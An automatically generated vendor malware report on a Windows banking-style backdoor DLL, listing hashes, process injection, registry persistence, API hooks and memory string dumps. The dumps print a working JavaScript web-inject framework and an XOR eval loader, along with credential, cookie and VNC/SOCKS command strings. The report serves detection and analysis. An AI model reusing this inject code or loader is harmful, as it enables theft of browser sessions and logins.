Gen.Variant.Razy.83620_a5f88e0327

by malwarelabrobot on September 3rd, 2017 in Malware Descriptions.

Gen:Variant.Razy.83620 (B) (Emsisoft), Gen:Variant.Razy.83620 (AdAware), GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: a5f88e0327ec6c6d070f43b524796ab3
SHA1: bca36ff6666b01f5512177349e3812884faf06ee
SHA256: 64798442a636f0e606281d9c9a7a2ab4c3f2aed2ad1906c557ddc5e142b366a8
SSDeep: 6144:kky4EJcjqsiGZirGLrAjNyPXdVvN72CNW:LyNiis0GkAPX/Vy
Size: 290816 bytes
File type: DLL
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2006-11-12 16:52:04
Analyzed on: Windows7 SP1 32-bit


Summary:

Backdoor. Malware that enables remote control of the victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

regsvr32.exe:1796

The Backdoor injects its code into the following process(es):

spoolsv.exe:1244
Explorer.EXE:1440
wmiprvse.exe:1468
conhost.exe:1624
TPAutoConnSvc.exe:1676
TPAutoConnect.exe:2160
conhost.exe:2168
SearchIndexer.exe:2228
sppsvc.exe:3244

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process regsvr32.exe:1796 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

C:\ProgramData\LibxaJximb\QamzEsom.ijv (1425 bytes)

Registry activity

The process regsvr32.exe:1796 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
To run itself automatically each time Windows boots, the Backdoor adds the following entry, pointing to its file, to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"LibxaJximb" = "regsvr32.exe C:\ProgramData\LibxaJximb\QamzEsom.ijv"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Backdoor installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Backdoor installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW

The Backdoor installs the following user-mode hooks in kernel32.dll:

CreateProcessA
CreateProcessW

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.1.7600.16385
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: cliconfg.exe
Internal Name: cliconfg.exe
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
File Description: SQL Client Configuration Utility EXE
Comments:
Language: Russian (Russia)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             180158        180224    5.48097  b59c2046e6af7d252af8df1ec8502f68
.data   184320           12092         8192      4.45016  618c91f77c765d9f3228c3c0b4da2f07
.rdata  196608           74289         75776     5.39355  bca71c338bba39b6e0ecc81b66c43569
.rsrc   274432           20560         22528     3.08036  caf8808e1cc07e448dcd3d53b2488ad5
.reloc  299008           1094          2048      1.12464  9ddd40658136f95c43bf4ca4de26fddc

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Backdoor connects to the servers at the following location(s):

spoolsv.exe_1244_rwx_024E0000_00055000:

.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="
";for (var _x%x=0;_x%x<_x%x.length;_x%x  )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));
_x%x  ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return 
this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}
9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll

Explorer.EXE_1440_rwx_04100000_00055000:


Explorer.EXE_1440_rwx_04620000_00077000:

C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}
{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{6B376189-11A2-4F58-96A6-001E03862004}
\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}
D{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{23DC640D-793E-4D8F-955D-2E6215F37B91}
U{687F46D2-25E5-43B6-BD95-68B725074F1D}
546B5A02-5978-4B96-802A-4C514A243A08

wmiprvse.exe_1468_rwx_00900000_00055000:

X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll

conhost.exe_1624_rwx_01E30000_00055000:

conhost.exe_1624_rwx_01E90000_00077000:

C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}
{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{6B376189-11A2-4F58-96A6-001E03862004}
\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}
D{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{23DC640D-793E-4D8F-955D-2E6215F37B91}
U{687F46D2-25E5-43B6-BD95-68B725074F1D}
546B5A02-5978-4B96-802A-4C514A243A08

TPAutoConnSvc.exe_1676_rwx_00840000_00055000:

TPAutoConnect.exe_2160_rwx_00390000_00055000:

TPAutoConnect.exe_2160_rwx_01A70000_00077000:

conhost.exe_2168_rwx_01150000_00055000:

conhost.exe_2168_rwx_014D0000_00077000:

[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}
{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{6B376189-11A2-4F58-96A6-001E03862004}
\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}
D{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{23DC640D-793E-4D8F-955D-2E6215F37B91}
U{687F46D2-25E5-43B6-BD95-68B725074F1D}
546B5A02-5978-4B96-802A-4C514A243A08
7%7.777@7
1#1-161@1|1
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort

SearchIndexer.exe_2228_rwx_03350000_00055000:

.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="
";for (var _x%x=0;_x%x<_x%x.length;_x%x++)
{_x%x+=String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));
_x%x++;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/"+this["_Key"]+"/"+Math["random"]()+"/"+Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]=="+"){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]=="+"){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/"+Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/"+Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/"+Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return 
this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/"+t+"/"+Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/"+t+"/"+Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: "+Cookie;Type="POST";};return this.Query(Type,"6/"+t+"/"+Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/"+t+"/"+Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/"+Timeout+"/"+Size+"/"+encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link+"\x0D\x0A"+Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/"+WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}
9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
